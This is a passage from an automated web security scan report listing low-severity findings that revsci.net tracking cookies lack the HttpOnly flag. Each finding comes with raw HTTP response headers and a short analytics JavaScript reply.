NkesRy++rBErZAYD7SmpB6lcs/JNNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:25:18 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:25:17 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.209. http://pix04.revsci.net/I10985/b3/0/3/1008211/623863779.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/623863779.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6H8nxMD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS2HThYKZWqUMcWyBPyxSGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKmZw2xC7bbnCVEHfnBLOzMvRVfruMSOCGmMmdNeNil75yxIjBb8Tjz+EXumvJish3UpAOYjx0sbj+YjnhWFjZE2bGoL1aY0bfwZSWlEh4DBz8ZSIsDwsiIIhSOP7byyJpIi4bVqNzEk+8Ul6xB61U7JixmsmVMhpVPNVDt2vRKGWlEkYkIZ52Q2cWjtmFe+5r6mqja6lDLQSZuaxJeUX8rURuWyiJPXLj0R0U2a/C0BTx+G78RIbKR4+rBx9Jj4NGZauHeS+e3S1HjhCIOr3JpUNYlbfpi0IG10pvSNmg5n4Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:28:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6H8nxMD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS2HThYKZWqUMcWyBPyxSGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKmZw2xC7bbnCVEHfnBLOzMvRVfruMSOCGmMmdNeNil75yxIjBb8Tjz+EXumvJish3UpAOYjx0sbj+YjnhWFjZE2bGoL1aY0bfwZSWlEh4DBz8ZSIsDwsiIIhSOP7byyJpIi4bVqNzEk+8Ul6xB61U7JixmsmVMhpVPNVDt2vRKGWlEkYkIZ52Q2cWjtmFe+5r6mqja6lDLQSZuaxJeUX8rURuWyiJPXLj0R0U2a/C0BTx+G78RIbKR4+rBx9Jj4NGZauHeS+e3S1HjhCIOr3JpUNYlbfpi0IG10pvSNmg5n4Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:28:25 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:28:25 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.210. http://pix04.revsci.net/I10985/b3/0/3/1008211/632139984.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/632139984.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88DtwWuaST+ZtDhThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhJtAtAulshuQUoryC/72YVVpNDQxcStz5UE9IczXJqDvkR8JClzxrwAHhY+YjBm6np04WhfEL/eoVfAKmCRQVqFeoU+OeN2/icHrVPrSpYtdsbhmOoiXiQRjZAPYmdmJ0c3GcjdfXL1gz6cIKgqwZRyRAp3yB2fb8oEJDkCdaj1W5SXV4stWBFXjplvk2vRvQd7t3evrQRWwEj3HTwDIeOo1VRtQC8zTdfyUSwKvalgv0KxRPYFCwAjTe43HOmv7P0ZHGbEtoABz8ZSEnvImSYI9Qd30iLuULKP9f2HkrEaaiut73Au1UUcFnA50QKuxspCuvu8mrE/b/hVyfBjuGwF9/co4YMGL4e8jDJ+77LnuApfK42UX+LTBsWyiPIvAlEla/glRUyBK2+ufhADgjs66PEeur98RNTZXxh8C9rD9CZ91Tvim7MayKU/GLRkH07U6uupaT9oFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:36:40 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88DtwWuaST+ZtDhThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhJtAtAulshuQUoryC/72YVVpNDQxcStz5UE9IczXJqDvkR8JClzxrwAHhY+YjBm6np04WhfEL/eoVfAKmCRQVqFeoU+OeN2/icHrVPrSpYtdsbhmOoiXiQRjZAPYmdmJ0c3GcjdfXL1gz6cIKgqwZRyRAp3yB2fb8oEJDkCdaj1W5SXV4stWBFXjplvk2vRvQd7t3evrQRWwEj3HTwDIeOo1VRtQC8zTdfyUSwKvalgv0KxRPYFCwAjTe43HOmv7P0ZHGbEtoABz8ZSEnvImSYI9Qd30iLuULKP9f2HkrEaaiut73Au1UUcFnA50QKuxspCuvu8mrE/b/hVyfBjuGwF9/co4YMGL4e8jDJ+77LnuApfK42UX+LTBsWyiPIvAlEla/glRUyBK2+ufhADgjs66PEeur98RNTZXxh8C9rD9CZ91Tvim7MayKU/GLRkH07U6uupaT9oFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:36:40 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:36:40 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.211. http://pix04.revsci.net/I10985/b3/0/3/1008211/656764106.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/656764106.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhyXtHbCSJbb2/JiEU9rR8N/1SuCaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTf/VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkN9X0yXpPm8m7PF1sT21QfNHLUnt/14AzpDXja0EmmRg/5YgysdNN4=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:45:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhyXtHbCSJbb2/JiEU9rR8N/1SuCaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTf/VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkN9X0yXpPm8m7PF1sT21QfNHLUnt/14AzpDXja0EmmRg/5YgysdNN4=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:45:58 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:45:57 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.212. http://pix04.revsci.net/I10985/b3/0/3/1008211/663059389.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/663059389.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EmhOXMQT7uItGF29/yo/tk8g7ZPQl+KT2sir9n5vw/ZUuJEqMB5SuHqPlIcMQ/wuGtIXDFi7gHtANUTDlM7WrYc77BvNkkm74YZr8vsOzTjWu1IMaklfrCIvnqjtBazo57KAavAGCJWMeY7+nWQvQPde28mCn8HVj3wn/LteM4fXqdP4oPyTwkuJUiBNLlwyKp1uPd5XVWarPuN9DSmpqdU4I3hB7P2eDvpimyKAvlNhKtgXGmh1fNzUoL4L0qR8Xev7sNOxpR8TSJvfdASryikRKuIoV0pjLiqzEC1DsFT+Q03yVLUiSLNxx9TAzykG9l+BdQSqPmBBY8gWAHs5T+Z13QbK7ZUBU0KP7gq6C6QZabQ+rvxFb2rH3na9vVIFbioRxyqw+0AKCF3TCDwjoxqYNq3VBnZgtZoSK4iN8fzUSwLvbl4vGB24IZl41PfE4CbO7AMULxN88ioWVIDRzO+Ze/xcH3C46oyYxPJ+Rd6m33NVOj7vqpyfyQt1UUcFhDJ25JsjzaLaFAl8uGNuMal0lzdhOVSJXxNN+bF8NI8ER6MvpozFI5xB3c3MQ2j06MLFF2iH3yy2K4flU8hwz7GxuYksxHzRPwya+5JxxiMFGcTphU5Tgkbwiw8s3afVem+k70CyER2yK2zXjhO; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:49:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EmhOXMQT7uItGF29/yo/tk8g7ZPQl+KT2sir9n5vw/ZUuJEqMB5SuHqPlIcMQ/wuGtIXDFi7gHtANUTDlM7WrYc77BvNkkm74YZr8vsOzTjWu1IMaklfrCIvnqjtBazo57KAavAGCJWMeY7+nWQvQPde28mCn8HVj3wn/LteM4fXqdP4oPyTwkuJUiBNLlwyKp1uPd5XVWarPuN9DSmpqdU4I3hB7P2eDvpimyKAvlNhKtgXGmh1fNzUoL4L0qR8Xev7sNOxpR8TSJvfdASryikRKuIoV0pjLiqzEC1DsFT+Q03yVLUiSLNxx9TAzykG9l+BdQSqPmBBY8gWAHs5T+Z13QbK7ZUBU0KP7gq6C6QZabQ+rvxFb2rH3na9vVIFbioRxyqw+0AKCF3TCDwjoxqYNq3VBnZgtZoSK4iN8fzUSwLvbl4vGB24IZl41PfE4CbO7AMULxN88ioWVIDRzO+Ze/xcH3C46oyYxPJ+Rd6m33NVOj7vqpyfyQt1UUcFhDJ25JsjzaLaFAl8uGNuMal0lzdhOVSJXxNN+bF8NI8ER6MvpozFI5xB3c3MQ2j06MLFF2iH3yy2K4flU8hwz7GxuYksxHzRPwya+5JxxiMFGcTphU5Tgkbwiw8s3afVem+k70CyER2yK2zXjhO; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:49:04 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:49:04 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.213. http://pix04.revsci.net/I10985/b3/0/3/1008211/677906397.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/677906397.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyRNxTMIyexPBnJTV8/3oC+TvABd95CD+ezofd4Bl1AlsaiOHp0geQducKlGfwpIOEBVo+GFwzeQN68obRNXALJBx3ZXWuVggM4xbwSYQwnhWWSGdh6qfSwPCfca7qT56dXHeSsV+R5VPp1govFhJJmNG+iFwpwaiKvYsTVErhovtcidI167GCwebR2BAz1y7hMfW0VodNBEt+pfLsa64tp8Wq8jPtl9ruFZ261m40X8QzfUzCGSWw992aSysyqxCtbK580lhNC5v3W2hXSP7VLNATBq+mR9LHb0MUwGA775Sahwg8SpOmUN8MQxOcqP03; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:06:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyRNxTMIyexPBnJTV8/3oC+TvABd95CD+ezofd4Bl1AlsaiOHp0geQducKlGfwpIOEBVo+GFwzeQN68obRNXALJBx3ZXWuVggM4xbwSYQwnhWWSGdh6qfSwPCfca7qT56dXHeSsV+R5VPp1govFhJJmNG+iFwpwaiKvYsTVErhovtcidI167GCwebR2BAz1y7hMfW0VodNBEt+pfLsa64tp8Wq8jPtl9ruFZ261m40X8QzfUzCGSWw992aSysyqxCtbK580lhNC5v3W2hXSP7VLNATBq+mR9LHb0MUwGA775Sahwg8SpOmUN8MQxOcqP03; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:06:41 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:06:41 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.214. http://pix04.revsci.net/I10985/b3/0/3/1008211/678221040.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/678221040.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAIEl+MaMcJSum2NZ+VEqMB7SuDqPkIcMw9wvTUz/xw+ppzybIZwKwWgY0UUnQiG5kFQmZouI+2ZBSjkw/QKBeEE1wCXGDbX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trGzWnlOqoD+91j7fcB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGRBe8iihXakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFligtQN54cgzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU86AmxfH0WcSpYG/n1/A45enPmYXILcczr1Ob5LQAcyOcRgvCViQb7zYFshfEnFZbda/3YGUcrFK9Xi3pG7800xiuwYalL797YznATh2rdj1dKDgZGk4Jbi2sFQBKisvVDTNlX8HJRUaqJAIuoclVNyoFehm83fWnbz95BIraDDpoJqjc7iSIE12hbXKRDsV5A1T0NNU=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:07:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAIEl+MaMcJSum2NZ+VEqMB7SuDqPkIcMw9wvTUz/xw+ppzybIZwKwWgY0UUnQiG5kFQmZouI+2ZBSjkw/QKBeEE1wCXGDbX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trGzWnlOqoD+91j7fcB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGRBe8iihXakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFligtQN54cgzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU86AmxfH0WcSpYG/n1/A45enPmYXILcczr1Ob5LQAcyOcRgvCViQb7zYFshfEnFZbda/3YGUcrFK9Xi3pG7800xiuwYalL797YznATh2rdj1dKDgZGk4Jbi2sFQBKisvVDTNlX8HJRUaqJAIuoclVNyoFehm83fWnbz95BIraDDpoJqjc7iSIE12hbXKRDsV5A1T0NNU=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:07:42 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:07:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.215. http://pix04.revsci.net/I10985/b3/0/3/1008211/697771504.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/697771504.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OcxNyVGoDIbkhMYAlEzdn2gzAYqpNfvJZa/Jo670TbHku9uay0K7xnjpTzbSDrr0/WaMF3qDSd89+72HHwqxqPEGogh1DYXPxyCfsv2Fv4yo/VamCu60gdfrSpkkxxC6jnwnPe560IjBTYADgDOwotNJqmCgZH7pSGzXThqOqRSA06vyDyeimVsjl1voXGfKX74a/GPXY7/qOB6t1KMEqP4WwwDehYTwm2b8vNtOMqkvctcKGDDkKKB0UdJtcN0mSr75VwAK0XUY3vaRhdsaYshJs6UhVJLK/Val2KyEDmB+L2lp9JqHsvRLqgLOl5XDKKRLQc/UBmorHEc/TIHBJNS1mg130iTqUH4VheUU+7XmFCi7owUI1/JSNLf3zVlP93r+tmLtsYrZSu4oloPzFDWLZakEAK9m0inSch7wHhKP2jDUlKH25wqHet39UNQmd+V5pabMBUMBnSgPn8qcRoMKbm4MH0u9ddDZ35h8C7g7+ztf1TvTm7N6yq2hVkZ7u74bje6nd1VoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:22:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OcxNyVGoDIbkhMYAlEzdn2gzAYqpNfvJZa/Jo670TbHku9uay0K7xnjpTzbSDrr0/WaMF3qDSd89+72HHwqxqPEGogh1DYXPxyCfsv2Fv4yo/VamCu60gdfrSpkkxxC6jnwnPe560IjBTYADgDOwotNJqmCgZH7pSGzXThqOqRSA06vyDyeimVsjl1voXGfKX74a/GPXY7/qOB6t1KMEqP4WwwDehYTwm2b8vNtOMqkvctcKGDDkKKB0UdJtcN0mSr75VwAK0XUY3vaRhdsaYshJs6UhVJLK/Val2KyEDmB+L2lp9JqHsvRLqgLOl5XDKKRLQc/UBmorHEc/TIHBJNS1mg130iTqUH4VheUU+7XmFCi7owUI1/JSNLf3zVlP93r+tmLtsYrZSu4oloPzFDWLZakEAK9m0inSch7wHhKP2jDUlKH25wqHet39UNQmd+V5pabMBUMBnSgPn8qcRoMKbm4MH0u9ddDZ35h8C7g7+ztf1TvTm7N6yq2hVkZ7u74bje6nd1VoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:22:25 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:22:25 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.216. http://pix04.revsci.net/I10985/b3/0/3/1008211/700812667.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/700812667.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

